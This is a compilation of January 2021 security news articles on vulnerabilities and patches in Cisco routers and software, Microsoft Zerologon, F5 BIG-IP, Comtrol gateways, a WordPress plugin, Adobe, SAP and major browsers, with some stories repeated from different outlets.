Cisco announced it will no longer release firmware updates to fix 74
vulnerabilities affecting its RV routers, which reached end-of-life (EOL).
Cisco will no longer release firmware updates to address 74 vulnerabilities
affecting some of its RV routers that reached end-of-life (EOL).
The vendor will not release updates for RV110W, RV130, RV130W, and RV215W devices the reached EOL in 2017 and 2018, but Cisco provided paid support until December 1, 2020.
The list of flaws affecting the devices includes RCEs, DoS issues, command injection vulnerabilities and XSS bugs.
Below the advisories published by the IT giant:
Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Management
Interface Remote Command Execution and Denial of Service Vulnerabilities;
Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Management
Interface Command Injection Vulnerabilities;
Cisco Small Business RV110W,
RV130, RV130W, and RV215W Routers Management Interface Stored Cross-Site
Scripting Vulnerabilities;
“Cisco has not released and will not release
software updates to address the vulnerabilities described in this advisory.”
reads the advisory. “The Cisco Small Business RV110W, RV130, RV130W, and RV215W
Routers have entered the end-of-life process. Customers are advised to refer to
the end-of-life notices for these products:
In order to exploit the flaws, the attackers need to have credentials for the device.
End-of-Sale and End-of-Life Announcement for the Cisco Small Business RV Series Routers (selected models)
The company is encouraging its customers to migrate to the Cisco Small Business RV132W, RV160, or RV160W Routers.
Cisco is not aware of attacks exploiting the vulnerabilities in the above advisories, it also added that the flaws are not simply exploitable.
“The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory.” concludes Cisco.
Microsoft Reminds Organizations of Upcoming Phase in Patching Zerologon
Vulnerability
16.1.2021
Vulnerebility
Securityweek
Microsoft this week published a reminder for organizations that a February 9 security update will kick off the second phase of patching for the Zerologon vulnerability.
Tracked as CVE-2020-1472 and addressed on August 2020 Patch Tuesday, the critical vulnerability was identified in the Microsoft Windows Netlogon Remote Protocol (MS-NRPC) and can be abused to compromise Active Directory domain controllers and gain admin access.
Exploitable by unauthenticated attackers able to run a specially crafted application on a device on the network, the vulnerability came into the spotlight in September, after the Department of Homeland Security (DHS) told federal agencies to immediately apply patches for it.
Attacks targeting the vulnerability were observed soon after, and Microsoft issued guidance on how organizations can secure systems affected by the bug. Attacks targeting Zerologon, however, continued.
Microsoft told customers that the patching for this vulnerability would be performed in two stages: the deployment of the August 11 patches, and an enforcement phase set to start on February 9, 2021.
Now, the company reminds organizations of the upcoming transition into the enforcement stage, which will kick off on February 2021 Patch Tuesday.
“We are reminding our customers that beginning with the February 9, 2021 Security Update release we will be enabling Domain Controller enforcement mode by default. This will block vulnerable connections from non-compliant devices,” Microsoft notes.
With the DC enforcement mode enabled, all Windows and non-Windows devices will have to use secure RPC with Netlogon secure channel. However, customers will have the option to add exceptions for non-compliant devices, even if that would render their accounts vulnerable.
In preparation for the enforcement mode phase, organizations should apply the available patch to all domain controllers and should identify and resolve non-compliant devices to ensure they won’t make vulnerable connections.
They can also enable the Domain Controller enforcement mode in their environments prior to the February 9 update.
In a report covering the 2020 threat landscape, Tenable considers Zerologon the top vulnerability of last year, out of 18,358 reported CVEs.
Expert discovered a DoS vulnerability in F5 BIG-IP systems
15.1.2021
Vulnerebility
Securityaffairs
A security researcher discovered a flaw in the F5 BIG-IP product that can be
exploited to conduct denial-of-service (DoS) attacks.
The security expert
Nikita Abramov from Positive Technologies discovered a DoS vulnerability,
tracked as CVE-2020-27716, that affects certain versions of F5 BIG-IP Access
Policy Manager (APM).
The F5 BIG-IP Access Policy Manager is a secure, flexible, high-performance access management proxy solution that delivers unified global access control for your users, devices, applications, and application programming interfaces (APIs).
The vulnerability resides in the Traffic Management Microkernel (TMM) component which processes all load-balanced traffic on BIG-IP devices.
“When a BIG-IP APM virtual server processes traffic of an undisclosed nature, the Traffic Management Microkernel (TMM) stops responding and restarts. (CVE-2020-27716)” reads the advisory published by F5. “Traffic processing is disrupted while TMM restarts. If the affected BIG-IP system is configured as part of a device group, the system triggers a failover to the peer device.”
An attacker could trigger the flaw by simply sending a specially crafted HTTP request to the server hosting the BIG-IP configuration utility, and that would be enough to block access to the controller for a while (until it automatically restarts).
“Vulnerabilities like this one are quite commonly found in code. They can occur
for different reasons, for example unconsciously neglected bydevelopers or due
to insufficient additional checks being carried out. I discovered this
vulnerability during binary analysis. Flaws like this one can be detected using
non-standard requests and by analyzing logic and logical inconsistencies.”
Nikita Abramov researcher at Positive Technologies explains.
The flaw impacts
versions 14.x and 15.x, the vendor already released security updates that
address it.
In June, researchers at F5 Networks addressed another flaw, tracked as CVE-2020-5902, which resides in undisclosed pages of Traffic Management User Interface (TMUI) of the BIG-IP product.
The vulnerability could be exploited by attackers to gain access to the TMUI component to execute arbitrary system commands, disable services, execute arbitrary Java code, and create or delete files, and potentially take over the BIG-IP device
The CVE-2020-5902 vulnerability received a CVSS score of 10, this means that is quite easy to exploit. The issue could be exploited by sending a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.
Immediately after the public disclosure of the flaw, that several proof-of-concept (PoC) exploits have been released, some of them are very easy to use.
A few days after the disclosure of the vulnerability in the F5 Networks BIG-IP product threat actors started exploiting it in attacks in the wild. Threat actors exploited the CVE-2020-5902 flaw to obtain passwords, create web shells, and infect systems with various malware.
Cisco addresses a High-severity flaw in CMX Software
15.1.2021
Vulnerebility
Securityaffairs
Cisco addressed tens of high-severity flaws, including some flaws in the
AnyConnect Secure Mobility Client and in its small business routers.
This
week Cisco released security updates to address 67 high-severity
vulnerabilities, including issues affecting Cisco’s AnyConnect Secure Mobility
Client and small business routers (i.e. Cisco RV110W, RV130, RV130W, and
RV215W). One of the flaws fixed by the tech giant, tracked as CVE-2021-1144, is
a high-severity vulnerability that affects Cisco Connected Mobile Experiences
(CMX), which is a smart Wi-Fi solution that uses the Cisco wireless
infrastructure to provide location services and location analytics for
consumers’ mobile devices. CMX supports your organization’s Wi-Fi and mobile
engagement and allows them to directly deliver content to smartphones and
tablets that are personalized to visitors’ preferences and pertinent to their
real-time indoor locations.
The vulnerability, which received a CVSS score of 8.8 out of 10, could be
exploited by a remote authenticated attacker to change the password for any
account user on affected systems.
“A vulnerability in Cisco Connected Mobile
Experiences (CMX) could allow a remote, authenticated attacker without
administrative privileges to alter the password of any user on an affected
system.” reads the advisory published by Cisco.
“The vulnerability is due to incorrect handling of authorization checks for
changing a password. An authenticated attacker without administrative privileges
could exploit this vulnerability by sending a modified HTTP request to an
affected device. A successful exploit could allow the attacker to alter the
passwords of any user on the system, including an administrative user, and then
impersonate that user.”
The flaw affects Cisco CMX releases 10.6.0, 10.6.1,
and 10.6.2.
The vendor addressed the flaw with the release of 10.6.3 software version, it also informed customers that are no workarounds that address this issue.
Cisco also addressed a DLL Injection flaw, tracked as CVE-2021-1237, in Cisco AnyConnect Secure Mobility Client for Windows.
The flaw received a CVSS score of 7.8, attackers could exploit it to conduct a
dynamic-link library (DLL) injection attack.
“A vulnerability in the Network
Access Manager and Web Security Agent components of Cisco AnyConnect Secure
Mobility Client for Windows could allow an authenticated, local attacker to
perform a DLL injection attack. To exploit this vulnerability, the attacker
would need to have valid credentials on the Windows system.” reads the advisory.
“The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges.”
Cisco also fixed a series of flaws in Small Business RV110W, RV130, RV130W, and RV215W Routers Management Interface that could lead remote command execution and denial of service attacks.
Vulnerability Exposes F5 BIG-IP Systems to Remote DoS Attacks
15.1.2021
Vulnerebility
Securityweek
A vulnerability discovered by a researcher in a BIG-IP product from F5 Networks can be exploited to launch remote denial-of-service (DoS) attacks.
The security flaw was discovered by Nikita Abramov, a researcher at cybersecurity solutions provider Positive Technologies, and it impacts certain versions of BIG-IP Access Policy Manager (APM), a secure access solution that simplifies and centralizes access to applications, APIs and data.
According to F5 Networks, the vulnerability is related to a component named Traffic Management Microkernel (TMM), which processes all load-balanced traffic on BIG-IP systems.
“When a BIG-IP APM virtual server processes traffic of an undisclosed nature, the Traffic Management Microkernel (TMM) stops responding and restarts,” the vendor explained in an advisory published in mid-December. “Traffic processing is disrupted while TMM restarts. If the affected BIG-IP system is configured as part of a device group, the system triggers a failover to the peer device.”
Abramov noted that exploiting this vulnerability does not require any tools — the attacker simply has to send a specially crafted HTTP request to the server hosting the BIG-IP configuration utility, which results in access to the system being blocked “for a while (until it automatically restarts).”
F5 said in its advisory that the vulnerability, tracked as CVE-2020-27716 with a severity rating of high, only impacts versions 14.x and 15.x. Updates that patch the flaw in both branches are available.
Last year, Positive Technologies informed F5 of a critical BIG-IP vulnerability that ended up being exploited in the wild, including by profit-driven cybercriminals and state-sponsored cyberspies.
Vulnerabilities Can Allow Hackers to Create Backdoors in Comtrol Industrial
Gateways
15.1.2021
Vulnerebility
Securityweek
Several vulnerabilities have been identified in Pepperl+Fuchs Comtrol IO-Link Master industrial gateways, including flaws that researchers claim can be exploited to gain root access to a device and create backdoors.
Vulnerabilities found in Pepperl+Fuchs Comtrol industrial gateways
A researcher at Austria-based cybersecurity consultancy SEC Consult discovered five types of vulnerabilities in Pepperl+Fuchs Comtrol industrial products, including cross-site request forgery (CSRF), reflected cross-site scripting (XSS), blind command injection, and denial-of-service (DoS) issues. The impacted products were found to leverage outdated versions of third-party components that were known to have vulnerabilities, including PHP, OpenSSL, BusyBox, Linux kernel, and lighttpd.
In an advisory published on January 4, Pepperl+Fuchs said the vulnerabilities can allow remote attackers to gain access to the targeted device, execute “any program,” and obtain information.
Johannes Greil, principal security consultant and head of the SEC Consult Vulnerability Lab, told SecurityWeek that if an attacker can gain access to one of the affected Comtrol devices — for example, by using an XSS attack or password guessing — they may be able to execute commands on the device with root privileges and implement persistent backdoors.
IO-Link is an industrial communications protocol used for digital sensors and actuators. Pepperl+Fuchs says its IO-Link Master product line “combines the benefits of the IO-Link standard with the EtherNet/IP and Modbus TCP protocols. The IO-Link Master effectively shields the PLC programmers from the IO-Link complexities by handling those complexities itself.”
The vendor patched the flaws discovered by SEC Consult several months after being informed of their existence. The company said a dozen IO-Link Master products are impacted and urged customers to update the U-Boot bootloader, the system image, and the application base to prevent exploitation.
Over 70 Vulnerabilities Will Remain Unpatched in EOL Cisco Routers
15.1.2021
Vulnerebility
Securityweek
Cisco this week announced that it does not plan on addressing tens of vulnerabilities affecting some of its small business routers.
A total of 68 high-severity flaws were identified in Cisco’s Small Business RV110W, RV130, RV130W, and RV215W routers, but the company says patches won’t be released, because these devices have reached end-of-life (EOL). The last day for software maintenance releases and bug fixes was December 1, 2020.
The security bugs exist because user-supplied input to the web-based management interface of the affected router series is not properly validated, thus allowing an attacker to send crafted HTTP requests to exploit these issues.
An attacker able to successfully exploit these vulnerabilities would be able to execute arbitrary code with root privileges on the underlying operating system. A mitigating factor, however, is that valid administrator credentials are required for exploitation.
In an advisory detailing 63 of these flaws, the tech giant explains that an attacker could also abuse them to restart the affected devices, leading to a denial-of-service (DoS) condition.
Cisco notes that the web-based management interface on these devices can be accessed either from the LAN or through a WAN connection, provided that remote management is enabled. However, the remote management feature is disabled by default on these devices.
“Cisco has not released and will not release software updates to address the vulnerabilities described […]. The Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers have entered the end-of-life process. Customers are advised to refer to the end-of-life notices for these products,” the company underlines.
Eight other vulnerabilities that remain unpatched in the same small business router series have been assessed as medium severity. These bugs could be abused by authenticated, remote attackers to launch cross-site scripting (XSS) attacks or access sensitive, browser-based information.
According to Cisco, there are no workarounds to address these vulnerabilities. However, the company says that it is not aware of public exploits targeting the security bugs.
Cisco this week released patches for tens of vulnerabilities, including two high-severity issues in enterprise software solutions.
The most important of these flaws is CVE-2021-1144, a high-severity bug (CVSS score of 8.8) in Connected Mobile Experiences (CMX) that could be abused by an authenticated attacker to modify the passwords for any user account on the system, including administrator accounts.
The bug exists because authorization checks for changing passwords are not correctly handled, enabling exploitation by an authenticated attacker, even if they do not have administrative privileges. The attacker can abuse the bug through sending a modified HTTP request to a vulnerable device.
Another high-severity flaw was found in the AnyConnect Secure Mobility Client for Windows, affecting the endpoint solution’s Network Access Manager and Web Security Agent components.
Tracked as CVE-2021-1237 (CVSS score of 7.8), the issue could be abused by an authenticated, local attacker for DLL injection. The bug exists because resources that the application loads at runtime are insufficiently validated.
“An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges,” Cisco explains.
The tech giant has released software updates to address both of these vulnerabilities and says that it is not aware of public exploits targeting any of them.
Cisco also published 18 other advisories detailing medium-severity bugs in Webex, ASR 5000 routers, Proximity Desktop for Windows, Enterprise NFV Infrastructure Software (NFVIS), Finesse, Video Surveillance 8000 IP Cameras, Firepower Management Center (FMC), DNA Center, Unified Communications products, CMX API authorizations, and AnyConnect Secure Mobility Client.
Three medium-severity vulnerabilities related to the Snort detection engine were found to impact a broad range of Cisco products, including Integrated Services Routers (ISRs), Cloud Services Router 1000V, Firepower Threat Defense (FTD), Integrated Services Virtual Router (ISRv), and several Meraki product series.
Details on these vulnerabilities can be found in the advisories Cisco published on its security portal.
High-Severity Cisco Flaw Found in CMX Software For Retailers
14.1.2021 Vulnerebility Threatpost
Cisco fixed high-severity flaws tied to 67 CVEs overall, including ones found inits AnyConnect Secure Mobility Client and in its RV110W, RV130, RV130W, and RV215W small business routers.
A high-severity flaw in Cisco’s smart Wi-Fi solution for retailers could allow a remote attacker to alter the password of any account user on affected systems.
The vulnerability is part of a number of patches issued by Cisco addressing 67 high-severity CVEs on Wednesday. This included flaws found in Cisco’s AnyConnect Secure Mobility Client, as well as Cisco RV110W, RV130, RV130W, and RV215W small business routers.
The most serious flaw afflicts Cisco Connected Mobile Experiences (CMX), a software solution that is utilized by retailers to provide business insights or on-site customer experience analytics. The solution uses the Cisco wireless infrastructure to collect a treasure trove of data from the retailer’s Wi-Fi network, including real-time customer-location tracking.
2020 Reader Survey: Share Your Feedback to Help Us Improve
For instance, if a customer connects to the Wi-Fi network of a store that utilizes CMX, retailers can track their locations within the venue, observe their behavior, and deliver special offers or promotions to them-while they’re there.
The vulnerability (CVE-2021-1144) is due to incorrect handling of authorization checks for changing a password. The flaw ranks 8.8 out of 10 on the CVSS vulnerability-severity scale, making it high severity. Of note, to exploit the flaw, an attacker must have an authenticated CMX account – but would not need administrative privileges.
“An authenticated attacker without administrative privileges could exploit this vulnerability by sending a modified HTTP request to an affected device,” said Cisco. “A successful exploit could allow the attacker to alter the passwords of any user on the system, including an administrative user, and then impersonate that user.”
Admins have a variety of privileges, including the ability to use File Transfer Protocol (FTP) commands for backing up and restoring data on Cisco CMX and gaining access to credentials (in order to unlock users who have been locked out of their accounts).
This vulnerability affects Cisco CMX releases 10.6.0, 10.6.1, and 10.6.2; the issue is patched in Cisco CMX releases 10.6.3 and later.
Other High-Severity Flaws
Another high-severity flaw (CVE-2021-1237) exists
in the Cisco AnyConnect Secure Mobility Client for Windows. AnyConnect Secure
Mobility Client, a modular endpoint software product, provides a wide range of
security services (such as remote access, web security features and roaming
protection) for endpoints.
The flaw allows attackers – if they are authenticated and local – to perform a dynamic-link library (DLL) injection attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system, Cisco said.
“An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts,” according to Cisco. “A successful exploit could allow the attacker to execute arbitrary code on the affected machine with system privileges.”
Sixty of those CVEs exist in in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W and RV215W routers. These flaws could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly.
“An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device,” according to Cisco. “A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial-of-service (DoS) condition.”
And, five more CVEs (CVE-2021-1146, CVE-2021-1147, CVE-2021-1148, CVE-2021-1149 and CVE-2021-1150) in the Cisco Small Business RV110W, RV130, RV130W, and RV215W routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges.
Critical WordPress-Plugin Bug Found in ‘Orbit Fox’ Allows Site Takeover
14.1.2021
Vulnerebility
Threatpost
Two security
vulnerabilities — one a privilege-escalation problem and the other a stored XSS
bug — afflict a WordPress plugin with 40,000 installs.
Two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.
Orbit Fox is a multi-featured WordPress plugin that works with the Elementor, Beaver Builder and Gutenberg site-building utilities. It allows site administrators to add features such as registration forms and widgets. The plugin, from a developer called ThemeIsle, has been installed by 400,000+ sites.
2020 Reader Survey: Share Your Feedback to Help Us Improve
According to researchers at Wordfence, the first flaw (CVEs are pending) is an authenticated privilege-escalation flaw that carries a CVSS bug-severity score of 9.9, making it critical. Authenticated attackers with contributor level access or above can elevate themselves to administrator status and potentially take over a WordPress site.
The second bug meanwhile is an authenticated stored cross-site scripting (XSS) issue that allows attackers with contributor or author level access to inject JavaScript into posts. This injection could be used to redirect visitors to malvertising sites or create new administrative users, among other actions. It’s rated 6.4 on the CVSS scale, making it medium severity.
Privilege Escalation
The privilege-escalation bug exists in the Orbit Fox
registration widget, according to researchers.
The widget is used to create registration forms with customizable fields when using the Elementor and Beaver Builder page-builder plugins. Site administrators can set a default role to be assigned to users who register on the site using the form.
“Lower-level users like contributors, authors, and editors were not shown the option to set the default user role from the editor. However, we found that they could still modify the default user role by crafting a request with the appropriate parameter,” Wordfence researchers explained, in a Tuesday posting. “The plugin provided client-side protection to prevent the role selector from being shown to lower-level users while adding a registration form. Unfortunately, there were no server-side protections or validation to verify that an authorized user was actually setting the default user role in a request.”
Server-side validation happens when data is sent to the server as a user enters it into a form. Once the server receives the request, it will then check for security issues, ensure that data is formatted correctly and prepare the submission for inserting or updating to a data source.
The lack of server-side validation in Orbit Fox means that lower-level contributors, authors and editors for the site could set the user role to that of an administrator upon successful registration – so, all attackers would need to do is register themselves as new users and would then be granted administrator privileges.
“To exploit this flaw, user registration would need to be enabled and the site would need to be running the Elementor or Beaver Builder plugins,” according to Wordfence. “A site with user registration disabled or neither of these plugins installed would not be affected by this vulnerability.”
Stored XSS
The medium-severity issue arises because contributors and authors
are able to add scripts to posts, despite not having the unfiltered_html
capability due to the header and footer script feature in Orbit Fox, according
to Wordfence.
“This flaw allowed lower-level users to add malicious JavaScript to posts that would execute in the browser whenever a user navigated to that page,” researchers explained. “As always with XSS vulnerabilities, this would make it possible for attackers to create new administrative users, inject malicious redirects and backdoors, or alter other site content through the use of malicious JavaScript.”
Both problems are patched in version 2.10.3; those sites running versions of Orbit Fox 2.10.2 and below should update as soon as possible.
WordPress Plugin Problems
The Orbit Fox bugs are the latest in the line of
faulty WordPress plugins that have come in recent months.
In October, two high-severity vulnerabilities in Post Grid, a WordPress plugin with more than 60,000 installations, were found to open the door to site takeovers. To boot, nearly identical bugs are also found in Post Grid’s sister plug-in, Team Showcase, which has 6,000 installations.
In September, a high-severity flaw in the Email Subscribers & Newsletters plugin by Icegram was found to affect more than 100,000 WordPress websites.
Earlier, in August, a plugin that is designed to add quizzes and surveys to WordPress websites patched two critical vulnerabilities. The flaws could be exploited by remote, unauthenticated attackers to launch varying attacks – including fully taking over vulnerable websites. Also in August, Newsletter, a WordPress plugin with more than 300,000 installations, was discovered to have a pair of vulnerabilities that could lead to code-execution and even site takeover.
And, researchers in July warned of a critical vulnerability in a WordPress plugin called Comments – wpDiscuz, which is installed on more than 70,000 websites. The flaw gave unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.
Adobe Fixes 7 Critical Flaws, Blocks Flash Player Content
13.1.2021
Vulnerebility
Threatpost
Adobe issued patches for seven critical arbitrary-code-execution flaws plaguing Windows and MacOS users.
Adobe Systems has patched seven critical vulnerabilities, which impact Windows, macOS and Linux users. The impact of the serious flaws range from arbitrary code execution to sensitive information disclosure.
The software company’s regularly scheduled Tuesday security updates impact a slew of its multimedia and creativity software products – from Photoshop to Illustrator to Adobe Bridge.
In tandem with Tuesday’s security update, Adobe starting on Tuesday will also block Flash Player content, weeks after dropping support for Flash. The move means that when users attempt to load a page with Flash Player, the content now will no longer load.
“Since Adobe will no longer be supporting Flash Player after December 31, 2020 and Adobe will block Flash content from running in Flash Player beginning January 12, 2021, Adobe strongly recommends all users immediately uninstall Flash Player to help protect their systems,” according to Adobe.
‘Priority 3’ Campaign Classic Update
One of the most severe critical flaws
(CVE-2021-21009) has been patched in Adobe Campaign Classic, Adobe’s marketing
campaign management platform.
“These updates address a critical server-side request forgery (SSRF) vulnerability that could result in sensitive information disclosure,” according to Adobe. SSRF is a web-based flaw that enables attackers to induce the server-side application to make HTTP requests to an arbitrary domain.
Various versions of Adobe Campaign Classic for Windows and Linux users are affected; a full detail of affected versions and patched versions are available here.
The flaw has a “priority 2” update ranking, which according to Adobe means that it resolves vulnerabilities in a product that has “historically been at elevated risk” – but for which there are currently no known exploits.
“Based on previous experience, we do not anticipate exploits are imminent,” according to Adobe. “As a best practice, Adobe recommends administrators install the update soon (for example, within 30 days).”
Of note, the remainder of Adobe’s patches, while critical, are “priority 3” updates, Chris Goettl, senior director of product management and security at Ivanti, told Threatpost. Out of the three priorities, “priority 1” is the most severe, while “priority 3” is the least serious. “Priority 3” updates resolve flaws in a product that has historically not been a target for attackers.
“Given this guidance, administrators should look to update Adobe Campaign Classic in their monthly maintenance,” Goettl told Threatpost. “The rest of the updates should be evaluated and updated as reasonable as it is never good to let software stagnate.”
Other Critical Flaws
In Adobe’s flagship Photoshop photo-editing application,
the company fixed a critical-severity heap-based buffer overflow vulnerability
(CVE-2021-21006). A heap-based buffer overflow is a class of vulnerability where
the region of a process’ memory used to store dynamic variables (the heap) can
be overwhelmed. If exploited, this flaw could enable arbitrary code execution.
The bug affects Photoshop 2021 version 22.1 and earlier for Windows and macOS; users should update to version 22.1.1.
Adobe’s Illustrator design application also has a critical flaw (CVE-2021-21007) stemming from an uncontrolled search path element. This category of vulnerability occurs when an application uses a fixed (or controlled) search path to find resources – but one or more locations of the path are under control of a malicious user.
The flaw, which could enable arbitrary code execution, exists in Illustrator 2020 for Windows and macOS versions 25 and earlier; version 25.1 contains the fix.
Adobe Bridge, Adobe’s digital asset management app, had critical vulnerabilities tied to two CVEs, CVE-2021-21012 and CVE-2021-21013.
These errors stem from out-of-bounds write issues, which stems from write operations that then produce undefined or unexpected results. If exploited the flaws can result in arbitrary code execution.
Both flaws exist in Adobe Bridge version 11 and earlier for Windows; a fix has been issued in version 11.0.1.
Adobe also fixed critical flaws in its Adobe Animate (CVE-2021-21008) and Adobe InCopy (CVE-2021-21010); as well as an important-severity flaw in Adobe Captivate (CVE-2021-21011).
The January patches follow Adobe’s regularly scheduled December security updates, where the company issued fixes for flaws tied to one important-rated and three critical-severity CVEs across its Adobe Prelude, Adobe Experience Manager and Adobe Lightroom applications.
SAP Patches Serious Code Injection, DoS Vulnerabilities
13.1.2021
Vulnerebility
Securityweek
German software maker SAP has published 10 advisories to document flaws and fixes for a range of serious security vulnerabilities.
SAP also published a total of 7 other updates for previously released security notes on this month’s Patch Day, for a total of 17 Notes. Five of these carry the highest severity rating of Hot News.
Dealing with multiple vulnerabilities in SAP Business Warehouse, the most important of these issues carry a CVSS score of 9.9.
The first of the notes addressed CVE-2021-21465, which SAP describes as multiple issues in Business Warehouse (Database Interface). These bugs are an SQL Injection and a missing authorization check (that features a CVSS score of 6.5), Onapsis, a firm that secures Oracle and SAP applications, explains.
“An improper sanitization of provided SQL commands allowed an attacker to execute arbitrary SQL commands on the database which could lead to a full compromise of the affected system,” Onapsis notes in a blog shared with SecurityWeek. Minimum privileges are required for successful exploitation.
The missing authorization check could be exploited to read any database table. Because SAP decided to fix the bug through disabling the function module, applying the patch will result in a dump of all of the applications that call this function module.
The second serious issue addresses CVE-2021-21466, a code injection flaw in both Business Warehouse and BW/4HANA.
Caused by insufficient input validation, the flaw could be abused to inject malicious code that gets stored persistently as a report and which could be executed afterwards, potentially affecting the confidentiality, integrity, and availability of systems. The attacker needs low privileges for exploitation.
The remaining three are updates for fixes previously released in April 2018 (updates for the Chrome browser in Business Client – CVSS score of 10), November 2020 (privilege escalation in NetWeaver Application Server for Java – CVSS score of 9.1), and December 2020 (code injection in Business Warehouse – CVSS score of 9.1).
A single advisory with a severity rating of High Priority was released this month, to address CVE-2021-21446 (CVSS score of 7.5), a denial of service issue in SAP NetWeaver AS ABAP and ABAP Platform.
A second warning that SAP released prior to the January 2021 Patch day fixes “an issue in the binding process of the Central Order service to a Cloud Foundry application” that could have allowed “unauthorized SAP employees to access the binding credentials of the service.”
Assessed as Medium and Low Priority, the remaining security notes address vulnerabilities in SAP Commerce Cloud, BusinessObjects, Master Data Governance, NetWeaver, GUI for Windows, 3D Visual Enterprise Viewer, Banking Services, and EPM add-in.
Adobe Releases First Security Updates of 2021 as It Blocks Flash Content
13.1.2021
Vulnerebility
Securityweek
Adobe on Tuesday released its first round of security updates for 2021, just as the company starts blocking Flash content.
Adobe has patched a total of eight vulnerabilities across seven of its products, including Photoshop, Illustrator, Animate, Campaign Classic, InCopy, Captivate and Bridge.
The company fixed two critical out-of-bounds write bugs in its digital asset management app Bridge. Both vulnerabilities can be exploited for arbitrary code execution in the context of the targeted user.
As for the remaining products, Adobe patched one vulnerability in each. Critical arbitrary code execution flaws were addressed in Photoshop, Illustrator, Animate and InCopy. A critical SSRF issue that can lead to sensitive information disclosure was fixed in Campaign Classic, and a privilege escalation bug rated important was patched in Captivate.
Adobe says there is no indication that the vulnerabilities patched on Tuesday have been exploited for malicious purposes and, based on the priority ratings assigned by the company to each update, it does not expect them to be leveraged by threat actors in their attacks.
On Tuesday, January 12, Adobe started blocking Flash content from running in Flash Player after the software reached end of life on December 31, 2020. Major web browser vendors are also disabling Flash Player and Adobe will remove all download links.
Flash Player vulnerabilities were often exploited by threat actors in their operations, but hackers increasingly started turning their attention to other software after Adobe, in mid-2017, announced plans to kill Flash.
In 2018, when threat groups were still targeting Flash vulnerabilities, Adobe released over a dozen security updates, but the number of updates dropped to six in 2019 and only three in 2020.
Bugs in Firefox, Chrome, Edge Allow Remote System Hijacking
9.1.2021 Vulnerebility Threatpost
Major browsers get an update to fix separate bugs that both allow for remote attacks, which could potentially allow hackers to takeover targeted devices.
Makers of the Chrome, Firefox and Edge browsers are urging users to patch critical vulnerabilities that if exploited allow hackers to hijack systems running the software.
The Mozilla Firefox vulnerability (CVE-2020-16044) is separate from a bug reported in Google’s browser engine Chromium, which is used in the Google Chrome browser and Microsoft’s latest version of its Edge browser.
Critical Firefox Use-After-Free Bug
On Thursday, the Cybersecurity and
Infrastructure Security Agency (CISA) urged users of Mozilla Foundation’s
Firefox browser to patch a bug, tracked as CVE-2020-16044, and rated as
critical. The vulnerability is classified as a use-after-free bug and tied to
the way Firefox handles browser cookies and if exploited allows hackers to gain
access to the computer, phone or tablet running the browser software.
Impacted are Firefox browser versions released prior to the recently released Firefox desktop 84.0.2, Firefox Android 84.1.3 edition and also Mozilla’s corporate ESR 78.6.1 version of Firefox.
“A malicious peer could have modified a COOKIE-ECHO chunk in a SCTP packet in a
way that potentially resulted in a use-after-free. We presume that with enough
effort it could have been exploited to run arbitrary code,” according to a
Mozilla security bulletin posted Thursday.
2020 Reader Survey: Share Your
Feedback to Help Us ImproveThe acronym SCTP stands for Stream Control
Transmission Protocol, used in computer networking to communicate protocol data
within the Transport Layer of the internet protocol suite, or TCP/IP. The bug is
tied to the way cookie data is handled by SCTP.
Each inbound SCTP packet contains a cookie chunk that facilitates a corresponding reply from the browser’s cookie. A COOKIE ECHO chunk is a snippet of data sent during the initialization of the SCTP connection with the browser.
According to Mozilla an adversary could craft a malicious COOKIE-ECHO chunk to impact the browser’s memory. A use-after-free vulnerability relates to incorrect use of dynamic memory during program operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to hack the program,” according to a description of the vulnerability.
Mozilla did not credit the bug discovery, nor did it state whether it was a vulnerability actively being exploited in the wild.
Chromium Browser Bug Impacts Chrome and Edge
Also on Thursday, CISA urged
Windows, macOS and Linux users of Google’s Chrome browser to patch an
out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141
version of the software. The CISA-bug warning stated that the update to the
latest version of the Chrome browser would “addresses vulnerabilities that an
attacker could exploit to take control of an affected system.”
Because Microsoft’s latest Edge browser is based on Google Chromium browser engine, Microsoft also urged its users to update to the latest 87.0.664.75 version of its Edge browser.
web browsers chrome firefox and edgeWhile researchers at Tenable classify the out-of-bounds bug as critical, both Google and Microsoft classified the vulnerability as high severity. Tencent Security Xuanwu Lab researcher Bohan Liu is credited for finding and reporting the bug.
Interestingly, the CVE-2020-15995 bug dates back to a Chrome for Android update security bulletin Google’s published on October 2020. At the time, the bug was also classified as high-severity. The flaw is identified as an “out of bounds write in V8”, bug originally found in September 2020 by Liu.
V8 is Google’s open-source and high-performance JavaScript and WebAssembly engine, according to a Google developer description. While the technical specifics of the bug are not available, similar out of bounds write in V8 bugs have allowed remote attackers to exploit a heap corruption via a crafted HTML page.
A heap corruption is a type of memory corruption that occurs in a computer program when the contents of a memory location are modified due to programmatic behavior — malicious or not — that exceeds the intention of the original programmer or program language parameters. A so-called heap-smashing attack can be used to exploit instances of heap corruption, according to an academic paper (PDF) co-authored by Nektarios Georgios Tsoutsos, student member of IEEE and Michail Maniatakos, senior member of IEEE.
